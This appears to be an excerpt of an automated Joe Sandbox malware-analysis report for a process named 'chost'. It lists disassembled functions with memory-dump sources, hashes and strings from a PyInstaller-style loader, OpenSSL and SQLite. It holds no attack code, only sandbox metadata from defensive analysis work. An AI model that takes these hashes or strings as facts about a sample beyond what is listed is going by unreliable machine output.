                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                        • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction ID: d6d34ffba79c9cf7b9ae432525aacaa44dc78855b73e51e0693e33ab5c1dc0a1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE029264A1DB0792FA35DB77A8D59B8B2A1EF04765B9481BDD41EC23A0EF3CB548C210
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439
                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6943688A7,?,?,00000000,00007FF694363CBB), ref: 00007FF69436821C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362810: MessageBoxW.USER32 ref: 00007FF6943628EA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                        • Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                        • Instruction ID: 19881956d4b0b640426b40011f359a08836b6217a42781f4b400ced101d51cec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A51A461A2D64381FB74AB37E8D26BA7260EF98784F54C579E90EC26D5EE2CE404C740
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                        • Opcode ID: adf16c7f5dd5dd042311f1e31ba3bd6dccb0c0644cb101887f07de4289785f5f
                                                                                                                                                                                                                                        • Instruction ID: 9a114c3843bf75e5076c0475f8d657baff8be09ddb9392e7641fcb66bdde48c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: adf16c7f5dd5dd042311f1e31ba3bd6dccb0c0644cb101887f07de4289785f5f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7518C21B0864792EA30AB33A4821A973A0FF84798F84C5B9EE4CC7796DE3CF555C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007B6570
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
                                                                                                                                                                                                                                        • API String ID: 4069847057-1099454403
                                                                                                                                                                                                                                        • Opcode ID: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                        • Instruction ID: 969930797a27a8247e1ba2a4ae5ed78f46e84760c045a3679cf95c6b6809bb6c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74416076B18A4696EB10DB21E860B7877A8EF44794F404535DA2E87ED9EF3CE950CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FFDF709D940: 00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF709DAE7
                                                                                                                                                                                                                                          • Part of subcall function 00007FFDF709D440: 00007FFE0E142010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDF7097857), ref: 00007FFDF709D59A
                                                                                                                                                                                                                                          • Part of subcall function 00007FFDF709D440: 00007FFE0E142010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDF7097857), ref: 00007FFDF709D617
                                                                                                                                                                                                                                        • 00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF7104B42
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
                                                                                                                                                                                                                                        • API String ID: 2636501453-2234786739
                                                                                                                                                                                                                                        • Opcode ID: 7f78d3a1e1e00efc653da4ffb875c65d86f2ba1fc8abed2fb87603ddfbabf6f9
                                                                                                                                                                                                                                        • Instruction ID: 3449da0df1c9aa73ef1051274216d64cb20f6146addcfc820fc25228c6c74eec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f78d3a1e1e00efc653da4ffb875c65d86f2ba1fc8abed2fb87603ddfbabf6f9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1B18B7BB08B818AE720CF65D4A0AAE37B1EB49788F145235DE6C077C9DB38D169C744
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                        • API String ID: 0-3733955532
                                                                                                                                                                                                                                        • Opcode ID: 7d86690b2a26f4a71fa6ff1b7e2b001420425af829b9134edd93df11bd6897cd
                                                                                                                                                                                                                                        • Instruction ID: ad6eb8d4398c4da408290c470c4edb7493c196cdef7d1d79c4f9f89231c48120
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d86690b2a26f4a71fa6ff1b7e2b001420425af829b9134edd93df11bd6897cd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA029E6AF09A8285EB158B25E474BF963B0EF45B80F085135DE6E867D8DF3CE458E340
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDF70A7BE4
                                                                                                                                                                                                                                        • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDF70A7D2C
                                                                                                                                                                                                                                        • Cannot add a PRIMARY KEY column, xrefs: 00007FFDF70A7951
                                                                                                                                                                                                                                        • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDF70A79DF
                                                                                                                                                                                                                                        • cannot add a STORED column, xrefs: 00007FFDF70A7B42
                                                                                                                                                                                                                                        • Cannot add a UNIQUE column, xrefs: 00007FFDF70A796C
                                                                                                                                                                                                                                        • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDF70A79BD
                                                                                                                                                                                                                                        • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDF70A79C7, 00007FFDF70A7A43, 00007FFDF70A7B51
                                                                                                                                                                                                                                        • Cannot add a column with non-constant default, xrefs: 00007FFDF70A7A39
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                        • API String ID: 2636501453-200680935
                                                                                                                                                                                                                                        • Opcode ID: 54c9b998d77841e0b21ccc2029236863fc8a44b2765e6384edbaf71f67d80b6e
                                                                                                                                                                                                                                        • Instruction ID: fea3ff3c625647fdf20c9dc65f7e256d468c39b2fc7cd67a8f1a81b48b3090c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54c9b998d77841e0b21ccc2029236863fc8a44b2765e6384edbaf71f67d80b6e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCE17B6AB08B8281EB258F15D564BF963B1EF48B84F04A135CA6D8B7D9DF3CE455A300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
                                                                                                                                                                                                                                        • API String ID: 3568877910-1794268454
                                                                                                                                                                                                                                        • Opcode ID: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                        • Instruction ID: 7cb1b4d75b437fa36bd9bde617acbd291c34c068b78e2ec6604378eec499de51
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1916622B0AF8281FB49DB65D460BBC7398FF45B08F184635DE7D07A9ADF28E5918310
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                        • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                        • Instruction ID: 877da75f18e5e8b3eee9767dd813e20d2e9a208c22d3939476ce08ce795968ee
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9551E726604BA186D6349F37E4581BAB7A1F798B61F008125EFDE83795DF3CD085DB10
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                        • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                        • Instruction ID: daa309e79a971a5938048be77156e171a5db39da0d2077ee6da1dba294006256
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C421A821B09A4382E7654B7BA8D5179A250EF88B94F588274EA3DC33E9DE2CD591C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378252189.00007FFDEAE41000.00000040.00000001.01000000.00000022.sdmp, Offset: 00007FFDEAE40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378210021.00007FFDEAE40000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEA2000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEEE000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEF2000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEF7000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF54000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF57000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378628612.00007FFDEAF58000.00000080.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378672916.00007FFDEAF59000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdeae40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 190073905-0
                                                                                                                                                                                                                                        • Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                        • Instruction ID: db59c1f221846c512e85dbd670ee823604ad35d8c6ae83fd3c9e0a46d1723ab4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B81D021F0C24346FA6DBB6694713BD2298AF85F80F5481B5EACC43796DE3EEC458712
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                        • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                        • Instruction ID: bcb615e6d2dc45115b3c08d31e0f14b4923dc47681d1c97be12a33c3beecd11d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB126C72A0C183C6FB749A2691A42B976A1FB50770F94C17DE6DAC6AC5DF3CE590CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
